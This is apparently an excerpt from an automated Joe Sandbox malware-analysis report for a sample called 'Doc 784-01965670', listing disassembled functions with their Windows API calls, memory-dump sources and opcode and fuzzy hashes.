                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2338827641-0
                                                                                                                                    • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                    • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                                    • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                    • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                                    Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                    • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                    • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                                    • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                    • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                                    Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                                    • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$DestroyIcon
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3419509030-0
                                                                                                                                    • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                    • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                                    • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                    • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                                    Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 004175AE
                                                                                                                                      • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                      • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                    • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                                    • __lock.LIBCMT ref: 004175DE
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                                    • InterlockedIncrement.KERNEL32(02FA2D10), ref: 00417626
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                    • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                    • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                                    • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                    • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                                    Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4023252218-0
                                                                                                                                    • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                    • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                                    • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                    • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                                    Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                                    • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                    • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                    • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                                    • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                    • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                                    Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1489400265-0
                                                                                                                                    • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                    • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                                    • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                    • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                                    Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1042038666-0
                                                                                                                                    • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                    • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                                    • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                    • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                                    Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                    • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                    • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                                    • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                    • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                                    Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                    • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                    • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 132634196-0
                                                                                                                                    • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                    • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                                    • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                    • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                                    Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                                      • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                    • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                                    • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                                    • __freeptd.LIBCMT ref: 0041563B
                                                                                                                                    • ExitThread.KERNEL32 ref: 00415643
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3798957060-0
                                                                                                                                    • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                    • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                                    • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                    • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                                    Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                    • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                    • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1537469427-0
                                                                                                                                    • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                    • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                                    • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                    • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                                    Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _malloc
                                                                                                                                    • String ID: Default$|k
                                                                                                                                    • API String ID: 1579825452-2254895183
                                                                                                                                    • Opcode ID: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
                                                                                                                                    • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                                    • Opcode Fuzzy Hash: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
                                                                                                                                    • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                                    Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memcmp
